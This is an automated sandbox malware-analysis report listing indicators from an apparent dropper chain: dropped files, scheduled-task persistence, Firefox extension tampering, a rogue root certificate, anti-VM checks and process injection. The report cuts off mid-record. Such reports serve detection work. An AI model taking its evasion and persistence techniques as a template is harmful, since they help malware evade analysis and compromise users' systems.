C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F3258A5B11F1178F530EE7A0197D8F15 FhZPPvs.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA CotgOgQ.exe File opened for modification C:\Windows\System32\GroupPolicy\gpt.ini smyDlk5Es9ywvt8vYzqP4xsg.exe File created C:\Windows\System32\GroupPolicy\Machine\Registry.pol smyDlk5Es9ywvt8vYzqP4xsg.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content CotgOgQ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_C66311BFC31F329FE5E6FBB46563B719 CotgOgQ.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 8 IoCs
pid Process 5000 2219fa1e23dac10134da6a6be9d6634a250dc2fc4cfdac1ad48d6e41c9406203.exe 2992 explorha.exe 4772 explorha.exe 1784 smyDlk5Es9ywvt8vYzqP4xsg.exe 5864 explorha.exe 5416 explorha.exe 5176 explorha.exe 2556 explorha.exe -
Suspicious use of SetThreadContext 5 IoCs
description pid Process procid_target PID 2712 set thread context of 4496 2712 swiiiii.exe 78 PID 1968 set thread context of 3324 1968 swiiii.exe 86 PID 2796 set thread context of 4812 2796 gold.exe 90 PID 2316 set thread context of 4964 2316 file300un.exe 93 PID 2744 set thread context of 4872 2744 alexxxxxxxx.exe 104 -
Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 5 IoCs
Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.
description ioc Process File opened (read-only) \??\VBoxMiniRdrDN WNVWzyQ9U4x61stEDAP6lzkw.exe File opened (read-only) \??\VBoxMiniRdrDN 3QQWENYHN4zHu7XvvsSKZTYq.exe File opened (read-only) \??\VBoxMiniRdrDN Ckl9TyIZXKdlKs1JCVsLffk7.exe File opened (read-only) \??\VBoxMiniRdrDN YYVxHJ2hAo7YMQ97pBCimtCf.exe File opened (read-only) \??\VBoxMiniRdrDN 4767d2e713f2021e8fe856e3ea638b58.exe -
Drops file in Program Files directory 39 IoCs
description ioc Process File created C:\Program Files (x86)\GameSyncLink\installg.bat install.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi CotgOgQ.exe File created C:\Program Files (x86)\PZjcxajBIsNTC\AmTHQUu.dll CotgOgQ.exe File opened for modification C:\Program Files (x86)\GameSyncLink\GameService.exe install.exe File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak CotgOgQ.exe File created C:\Program Files (x86)\ADJLsahCU\BcSeElW.xml FhZPPvs.exe File opened for modification C:\Program Files (x86)\GameSyncLink\installm.bat install.exe File opened for modification C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe install.exe File opened for modification C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe install.exe File created C:\Program Files (x86)\PZjcxajBIsNTC\wKCalaf.xml FhZPPvs.exe File created C:\Program Files (x86)\mWJfrhglotUn\usgaMXv.dll FhZPPvs.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja CotgOgQ.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi FhZPPvs.exe File created C:\Program Files (x86)\AymmxTCbqblaRZJGVqR\vqlvkhH.dll CotgOgQ.exe File created C:\Program Files (x86)\AymmxTCbqblaRZJGVqR\SEacfvq.xml CotgOgQ.exe File created C:\Program Files (x86)\AymmxTCbqblaRZJGVqR\ZejsVIC.dll FhZPPvs.exe File created C:\Program Files (x86)\PZjcxajBIsNTC\XqwFgzo.dll FhZPPvs.exe File created C:\Program Files (x86)\PZjcxajBIsNTC\lANuDZv.xml CotgOgQ.exe File created C:\Program Files (x86)\GameSyncLink\GameService.exe install.exe File created C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe install.exe File created C:\Program Files (x86)\ADJLsahCU\HzvOZz.dll FhZPPvs.exe File created C:\Program Files (x86)\DQANlvmTAvZU2\HkLcRXzDBqqXF.dll CotgOgQ.exe File created C:\Program Files (x86)\DQANlvmTAvZU2\PHYzavZOuZqzQ.dll FhZPPvs.exe File created C:\Program Files (x86)\AymmxTCbqblaRZJGVqR\uvvouwo.xml FhZPPvs.exe File created C:\Program Files (x86)\DQANlvmTAvZU2\phqMPFN.xml FhZPPvs.exe File created C:\Program Files (x86)\mWJfrhglotUn\JSnaPUK.dll CotgOgQ.exe File created C:\Program Files (x86)\GameSyncLink\installc.bat install.exe File created C:\Program Files (x86)\GameSyncLink\installm.bat install.exe File created C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe install.exe File created C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe install.exe File created C:\Program Files (x86)\ADJLsahCU\kcXDqX.dll CotgOgQ.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja.bak CotgOgQ.exe File opened for modification C:\Program Files (x86)\GameSyncLink\installc.bat install.exe File opened for modification C:\Program Files (x86)\GameSyncLink\installg.bat install.exe File created C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi CotgOgQ.exe File created C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi FhZPPvs.exe File created C:\Program Files (x86)\DQANlvmTAvZU2\snzniaG.xml CotgOgQ.exe File opened for modification C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe install.exe File created C:\Program Files (x86)\ADJLsahCU\jgzmjeb.xml CotgOgQ.exe -
Drops file in Windows directory 20 IoCs
description ioc Process File created C:\Windows\Tasks\explorha.job 2219fa1e23dac10134da6a6be9d6634a250dc2fc4cfdac1ad48d6e41c9406203.exe File created C:\Windows\Tasks\XyyyteIMwZeutaZuw.job schtasks.exe File created C:\Windows\rss\csrss.exe 4767d2e713f2021e8fe856e3ea638b58.exe File created C:\Windows\windefender.exe csrss.exe File opened for modification C:\Windows\rss YYVxHJ2hAo7YMQ97pBCimtCf.exe File created C:\Windows\rss\csrss.exe YYVxHJ2hAo7YMQ97pBCimtCf.exe File opened for modification C:\Windows\rss 4767d2e713f2021e8fe856e3ea638b58.exe File created C:\Windows\Tasks\bbmnnUCIPYyTQrzMQJ.job schtasks.exe File opened for modification C:\Windows\Tasks\XyyyteIMwZeutaZuw.job schtasks.exe File created C:\Windows\Tasks\rrqYunoktxOQmCoCX.job schtasks.exe File opened for modification C:\Windows\rss 3QQWENYHN4zHu7XvvsSKZTYq.exe File opened for modification C:\Windows\rss Ckl9TyIZXKdlKs1JCVsLffk7.exe File opened for modification C:\Windows\Tasks\bbmnnUCIPYyTQrzMQJ.job schtasks.exe File created C:\Windows\Tasks\FPieTEPPuEmJrhC.job schtasks.exe File opened for modification C:\Windows\Tasks\FPieTEPPuEmJrhC.job schtasks.exe File opened for modification C:\Windows\rss WNVWzyQ9U4x61stEDAP6lzkw.exe File created C:\Windows\rss\csrss.exe Ckl9TyIZXKdlKs1JCVsLffk7.exe File created C:\Windows\rss\csrss.exe 3QQWENYHN4zHu7XvvsSKZTYq.exe File created C:\Windows\rss\csrss.exe WNVWzyQ9U4x61stEDAP6lzkw.exe File opened for modification C:\Windows\windefender.exe csrss.exe -
Launches sc.exe 6 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 1100 sc.exe 1368 sc.exe 1076 sc.exe 4908 sc.exe 1572 sc.exe 684 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 3 IoCs
pid pid_target Process procid_target 4636 2712 WerFault.exe 76 592 2744 WerFault.exe 103 5300 3052 WerFault.exe 172 -
Checks SCSI registry key(s) 3 TTPs 9 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI u240.1.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI u240.1.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI u3s8.1.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI u240.1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI toolspub1.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI toolspub1.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI toolspub1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI u3s8.1.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI u3s8.1.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 u240.0.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString u240.0.exe -
Creates scheduled task(s) 1 TTPs 21 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 5684 schtasks.exe 5324 schtasks.exe 3100 schtasks.exe 652 schtasks.exe 3656 schtasks.exe 5896 schtasks.exe 4268 schtasks.exe 4804 schtasks.exe 3624 schtasks.exe 4912 schtasks.exe 3660 schtasks.exe 3160 schtasks.exe 4340 schtasks.exe 5976 schtasks.exe 4960 schtasks.exe 5296 schtasks.exe 5976 schtasks.exe 5876 schtasks.exe 6004 schtasks.exe 1392 schtasks.exe 4224 schtasks.exe -
Enumerates system info in registry 2 TTPs 6 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName rundll32.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1502 = "Turkey Standard Time" WNVWzyQ9U4x61stEDAP6lzkw.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" CotgOgQ.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-752 = "Tonga Standard Time" WNVWzyQ9U4x61stEDAP6lzkw.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-502 = "Nepal Standard Time" WNVWzyQ9U4x61stEDAP6lzkw.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-1971 = "Belarus Daylight Time" windefender.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2492 = "Aus Central W. Standard Time" WNVWzyQ9U4x61stEDAP6lzkw.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-222 = "Alaskan Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-214 = "Pacific Daylight Time (Mexico)" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-272 = "Greenwich Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-1802 = "Line Islands Standard Time" windefender.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-572 = "China Standard Time" windefender.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-449 = "Azerbaijan Standard Time" WNVWzyQ9U4x61stEDAP6lzkw.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-132 = "US Eastern Standard Time" WNVWzyQ9U4x61stEDAP6lzkw.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" CotgOgQ.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-221 = "Alaskan Daylight Time" WNVWzyQ9U4x61stEDAP6lzkw.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-434 = "Georgian Daylight Time" WNVWzyQ9U4x61stEDAP6lzkw.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-542 = "Myanmar Standard Time" WNVWzyQ9U4x61stEDAP6lzkw.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-71 = "Newfoundland Daylight Time" WNVWzyQ9U4x61stEDAP6lzkw.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" CotgOgQ.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-541 = "Myanmar Daylight Time" WNVWzyQ9U4x61stEDAP6lzkw.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2062 = "North Korea Standard Time" WNVWzyQ9U4x61stEDAP6lzkw.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064 jok.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064\Blob = 0b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f00720069007400790000000200000001000000cc0000001c0000006c00000001000000000000000000000000000000010000007b00340031003700340034004200450034002d0031003100430035002d0034003900340043002d0041003200310033002d004200410030004300450039003400340039003300380045007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e00300000000000030000000100000014000000f1a578c4cb5de79a370893983fd4da8b67b2b06420000000010000000a03000030820306308201eea003020102020867f7beb96a4c2798300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233303331343130333532305a170d3236303631373130333532305a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a028201010086e4577a5861ce819177d005fa51d5515a936c610ccfcbde5332cd151da647ee881a245c9b02833b02af3d76fe20bd3bfaf7a20973e72ebd9440d09d8c3d2713bdf0d09feb9532acd7a42da2a952daa86a2a88ee427d30959d90bfba05276aa02998a6986fc01306629b79b8405d1f1fa6d9a42f827afc7566340dc2de27012b94bb4a27b3cb1c219a3cb2c14203f34451bd626520edd4dbcc414f593f2acbc48479f7143cbe139cfd129c913e5303dc20f94c44358901b69a848d7ea02e308a311560ac00ae009a29109aeed9713dd8919b97ed598058e17f0726c7a020f710abc06291dfaaf181c6be6a76c89cb68eb0b0ec1cd95f326c7e55588bfd76c5190203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010070851293d757e982797dc5f7f27da894ef0cdb329f06a6096e0cf604b0e54711560ef40f5282082e210f55a3db41f312548b7611f5f0dacea3c78b13f6fc243c02b106665be69e184088415b273999b877bee353a248cec7eeb5a095c2174bc9526cafe3372c59dbfbe758134ed351e5147273fec68577ae4552a6f99ac80ca8d0ee422af528858c6be81cb0a8031ab0ae83c0eb5564f4e87a5c06295d3903eee2fdf92d62a7f4d4054deaa79bcaebda4e8b1a6efd42aef9d01c7075728cb13aa8557c85a72532b5e2d6c3e55041c9867ca8f562bbd2ab0c3710d83173ec3781d1dcaac5c6e07ee726624dfdc5814cffd336e17932f89beb9cf7fdbee9bebf61 jok.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 5000 2219fa1e23dac10134da6a6be9d6634a250dc2fc4cfdac1ad48d6e41c9406203.exe 5000 2219fa1e23dac10134da6a6be9d6634a250dc2fc4cfdac1ad48d6e41c9406203.exe 2992 explorha.exe 2992 explorha.exe 3544 powershell.exe 3544 powershell.exe 3544 powershell.exe 3544 powershell.exe 4772 explorha.exe 4772 explorha.exe 2696 rundll32.exe 2696 rundll32.exe 2696 rundll32.exe 2696 rundll32.exe 2696 rundll32.exe 2696 rundll32.exe 2696 rundll32.exe 2696 rundll32.exe 2696 rundll32.exe 2696 rundll32.exe 1044 powershell.exe 1044 powershell.exe 1044 powershell.exe 1044 powershell.exe 3828 GameService.exe 3828 GameService.exe 4560 GameService.exe 4560 GameService.exe 2464 GameService.exe 2464 GameService.exe 4280 keks.exe 4280 keks.exe 4280 keks.exe 4280 keks.exe 3828 GameService.exe 3828 GameService.exe 4560 GameService.exe 4560 GameService.exe 2464 GameService.exe 2464 GameService.exe 236 trf.exe 236 trf.exe 3828 GameService.exe 3828 GameService.exe 4560 GameService.exe 4560 GameService.exe 2464 GameService.exe 2464 GameService.exe 4560 GameService.exe 4560 GameService.exe 5580 powershell.exe 5580 powershell.exe 5580 powershell.exe 5580 powershell.exe 2464 GameService.exe 2464 GameService.exe 3828 GameService.exe 3828 GameService.exe 3956 jok.exe 3956 jok.exe 3956 jok.exe 3956 jok.exe 5212 powershell.exe 5212 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2316 file300un.exe Token: SeDebugPrivilege 3544 powershell.exe Token: SeDebugPrivilege 4964 regsvcs.exe Token: SeIncreaseQuotaPrivilege 3544 powershell.exe Token: SeSecurityPrivilege 3544 powershell.exe Token: SeTakeOwnershipPrivilege 3544 powershell.exe Token: SeLoadDriverPrivilege 3544 powershell.exe Token: SeSystemProfilePrivilege 3544 powershell.exe Token: SeSystemtimePrivilege 3544 powershell.exe Token: SeProfSingleProcessPrivilege 3544 powershell.exe Token: SeIncBasePriorityPrivilege 3544 powershell.exe Token: SeCreatePagefilePrivilege 3544 powershell.exe Token: SeBackupPrivilege 3544 powershell.exe Token: SeRestorePrivilege 3544 powershell.exe Token: SeShutdownPrivilege 3544 powershell.exe Token: SeDebugPrivilege 3544 powershell.exe Token: SeSystemEnvironmentPrivilege 3544 powershell.exe Token: SeRemoteShutdownPrivilege 3544 powershell.exe Token: SeUndockPrivilege 3544 powershell.exe Token: SeManageVolumePrivilege 3544 powershell.exe Token: 33 3544 powershell.exe Token: 34 3544 powershell.exe Token: 35 3544 powershell.exe Token: 36 3544 powershell.exe Token: SeDebugPrivilege 236 trf.exe Token: SeBackupPrivilege 236 trf.exe Token: SeSecurityPrivilege 236 trf.exe Token: SeSecurityPrivilege 236 trf.exe Token: SeSecurityPrivilege 236 trf.exe Token: SeSecurityPrivilege 236 trf.exe Token: SeDebugPrivilege 1044 powershell.exe Token: SeDebugPrivilege 4280 keks.exe Token: SeDebugPrivilege 5580 powershell.exe Token: SeDebugPrivilege 3956 jok.exe Token: SeDebugPrivilege 5212 powershell.exe Token: SeIncreaseQuotaPrivilege 5504 WMIC.exe Token: SeSecurityPrivilege 5504 WMIC.exe Token: SeTakeOwnershipPrivilege 5504 WMIC.exe Token: SeLoadDriverPrivilege 5504 WMIC.exe Token: SeSystemProfilePrivilege 5504 WMIC.exe Token: SeSystemtimePrivilege 5504 WMIC.exe Token: SeProfSingleProcessPrivilege 5504 WMIC.exe Token: SeIncBasePriorityPrivilege 5504 WMIC.exe Token: SeCreatePagefilePrivilege 5504 WMIC.exe Token: SeBackupPrivilege 5504 WMIC.exe Token: SeRestorePrivilege 5504 WMIC.exe Token: SeShutdownPrivilege 5504 WMIC.exe Token: SeDebugPrivilege 5504 WMIC.exe Token: SeSystemEnvironmentPrivilege 5504 WMIC.exe Token: SeRemoteShutdownPrivilege 5504 WMIC.exe Token: SeUndockPrivilege 5504 WMIC.exe Token: SeManageVolumePrivilege 5504 WMIC.exe Token: 33 5504 WMIC.exe Token: 34 5504 WMIC.exe Token: 35 5504 WMIC.exe Token: 36 5504 WMIC.exe Token: SeIncreaseQuotaPrivilege 5504 WMIC.exe Token: SeSecurityPrivilege 5504 WMIC.exe Token: SeTakeOwnershipPrivilege 5504 WMIC.exe Token: SeLoadDriverPrivilege 5504 WMIC.exe Token: SeSystemProfilePrivilege 5504 WMIC.exe Token: SeSystemtimePrivilege 5504 WMIC.exe Token: SeProfSingleProcessPrivilege 5504 WMIC.exe Token: SeIncBasePriorityPrivilege 5504 WMIC.exe -
Suspicious use of FindShellTrayWindow 14 IoCs
pid Process 4680 u240.1.exe 4680 u240.1.exe 4680 u240.1.exe 4680 u240.1.exe 4680 u240.1.exe 4680 u240.1.exe 4680 u240.1.exe 5412 u3s8.1.exe 5412 u3s8.1.exe 5412 u3s8.1.exe 5412 u3s8.1.exe 5412 u3s8.1.exe 5412 u3s8.1.exe 5412 u3s8.1.exe -
Suspicious use of SendNotifyMessage 14 IoCs
pid Process 4680 u240.1.exe 4680 u240.1.exe 4680 u240.1.exe 4680 u240.1.exe 4680 u240.1.exe 4680 u240.1.exe 4680 u240.1.exe 5412 u3s8.1.exe 5412 u3s8.1.exe 5412 u3s8.1.exe 5412 u3s8.1.exe 5412 u3s8.1.exe 5412 u3s8.1.exe 5412 u3s8.1.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 5000 wrote to memory of 2992 5000 2219fa1e23dac10134da6a6be9d6634a250dc2fc4cfdac1ad48d6e41c9406203.exe 75 PID 5000 wrote to memory of 2992 5000 2219fa1e23dac10134da6a6be9d6634a250dc2fc4cfdac1ad48d6e41c9406203.exe 75 PID 5000 wrote to memory of 2992 5000 2219fa1e23dac10134da6a6be9d6634a250dc2fc4cfdac1ad48d6e41c9406203.exe 75 PID 2992 wrote to memory of 2712 2992 explorha.exe 76 PID 2992 wrote to memory of 2712 2992 explorha.exe 76 PID 2992 wrote to memory of 2712 2992 explorha.exe 76 PID 2712 wrote to memory of 4496 2712 swiiiii.exe 78 PID 2712 wrote to memory of 4496 2712 swiiiii.exe 78 PID 2712 wrote to memory of 4496 2712 swiiiii.exe 78 PID 2712 wrote to memory of 4496 2712 swiiiii.exe 78 PID 2712 wrote to memory of 4496 2712 swiiiii.exe 78 PID 2712 wrote to memory of 4496 2712 swiiiii.exe 78 PID 2712 wrote to memory of 4496 2712 swiiiii.exe 78 PID 2712 wrote to memory of 4496 2712 swiiiii.exe 78 PID 2712 wrote to memory of 4496 2712 swiiiii.exe 78 PID 2992 wrote to memory of 3956 2992 explorha.exe 445 PID 2992 wrote to memory of 3956 2992 explorha.exe 445 PID 2992 wrote to memory of 3956 2992 explorha.exe 445 PID 2992 wrote to memory of 1968 2992 explorha.exe 83 PID 2992 wrote to memory of 1968 2992 explorha.exe 83 PID 2992 wrote to memory of 1968 2992 explorha.exe 83 PID 1968 wrote to memory of 4680 1968 swiiii.exe 506 PID 1968 wrote to memory of 4680 1968 swiiii.exe 506 PID 1968 wrote to memory of 4680 1968 swiiii.exe 506 PID 1968 wrote to memory of 3324 1968 swiiii.exe 86 PID 1968 wrote to memory of 3324 1968 swiiii.exe 86 PID 1968 wrote to memory 